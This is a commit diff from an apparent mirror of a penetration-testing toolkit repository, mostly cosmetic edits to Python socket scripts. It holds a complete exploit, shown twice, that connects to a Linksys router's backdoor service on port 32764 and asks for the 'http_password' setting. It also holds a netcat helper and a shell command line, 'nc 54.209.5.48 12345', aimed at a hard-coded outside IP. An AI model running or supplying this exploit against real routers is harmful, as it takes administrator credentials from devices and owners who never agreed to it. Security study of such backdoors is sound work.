mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-26 18:49:08 -04:00
socket adds
This commit is contained in:
parent
5f1dc0b4c4
commit
d01824f424
@ -1,3 +1,8 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import sys
|
||||
@ -7,23 +12,33 @@ HOST = '192.168.33.1'
|
||||
PORT = 32764
|
||||
|
||||
def send_message(s, message, payload=''):
|
||||
|
||||
header = struct.pack('<III', 0x53634D4D, message, len(payload))
|
||||
s.send(header+payload)
|
||||
response = s.recv(0xC)
|
||||
|
||||
if len(response) != 12:
|
||||
print("Device is not a crackable Linksys router.")
|
||||
print("Recieved invalid response: %s" % response)
|
||||
raise sys.exit(1)
|
||||
|
||||
sig, ret_val, ret_len = struct.unpack('<III', response)
|
||||
|
||||
assert(sig == 0x53634D4D)
|
||||
|
||||
if ret_val != 0:
|
||||
return ret_val, "ERROR"
|
||||
ret_str = ""
|
||||
|
||||
while len(ret_str) < ret_len:
|
||||
ret_str += s.recv(ret_len-len(ret_str))
|
||||
ret_str += s.recv(ret_len - len(ret_str))
|
||||
|
||||
return ret_val, ret_str
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")
|
||||
|
@ -20,14 +20,23 @@
|
||||
### socket
|
||||
|
||||
- Several scripts with Python's **socket** module:
|
||||
* netcat
|
||||
* cracking linksys
|
||||
* reading socket
|
||||
* TCP Client
|
||||
* TCP Server
|
||||
* UDP Client
|
||||
|
||||
|
||||
### telnetlib
|
||||
|
||||
- Example of a script to create a telnet connection with Python's **telnetlib** module.
|
||||
|
||||
|
||||
### scapy
|
||||
|
||||
- Example scripts with Python's **scapy** module:
|
||||
- Several scripts with Python's **scapy** module:
|
||||
* traceroute
|
||||
|
||||
|
||||
|
||||
|
@ -1,3 +1,8 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import sys
|
||||
@ -7,23 +12,33 @@ HOST = '192.168.33.1'
|
||||
PORT = 32764
|
||||
|
||||
def send_message(s, message, payload=''):
|
||||
|
||||
header = struct.pack('<III', 0x53634D4D, message, len(payload))
|
||||
s.send(header+payload)
|
||||
response = s.recv(0xC)
|
||||
|
||||
if len(response) != 12:
|
||||
print("Device is not a crackable Linksys router.")
|
||||
print("Recieved invalid response: %s" % response)
|
||||
raise sys.exit(1)
|
||||
|
||||
sig, ret_val, ret_len = struct.unpack('<III', response)
|
||||
|
||||
assert(sig == 0x53634D4D)
|
||||
|
||||
if ret_val != 0:
|
||||
return ret_val, "ERROR"
|
||||
ret_str = ""
|
||||
|
||||
while len(ret_str) < ret_len:
|
||||
ret_str += s.recv(ret_len-len(ret_str))
|
||||
ret_str += s.recv(ret_len - len(ret_str))
|
||||
|
||||
return ret_val, ret_str
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")
|
||||
|
@ -1,31 +1,35 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "bt3gl"
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
PORT = 12345
|
||||
HOSTNAME = '54.209.5.48'
|
||||
|
||||
|
||||
def netcat(hostname, port, content):
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((hostname, port))
|
||||
s.sendall(content)
|
||||
s.shutdown(socket.SHUT_WR)
|
||||
adata = []
|
||||
|
||||
while 1:
|
||||
data = s.recv(1024)
|
||||
if data == "":
|
||||
break
|
||||
adata.append(data)
|
||||
|
||||
s.close()
|
||||
|
||||
return adata
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
PORT = 12345
|
||||
HOSTNAME = '54.209.5.48'
|
||||
message = netcat(HOSTNAME, PORT, '')[1]
|
||||
print message
|
@ -1,7 +1,6 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "bt3gl"
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import os
|
||||
@ -50,7 +49,6 @@ def ntext():
|
||||
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
SHELL_COMMAND = "nc 54.209.5.48 12345"
|
||||
|
||||
|
6
Network_and_802.11/socket/tcp_client.py
Normal file
6
Network_and_802.11/socket/tcp_client.py
Normal file
@ -0,0 +1,6 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
@ -1,7 +1,6 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "bt3gl"
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
from telnetlib import Telnet
|
Loading…
x
Reference in New Issue
Block a user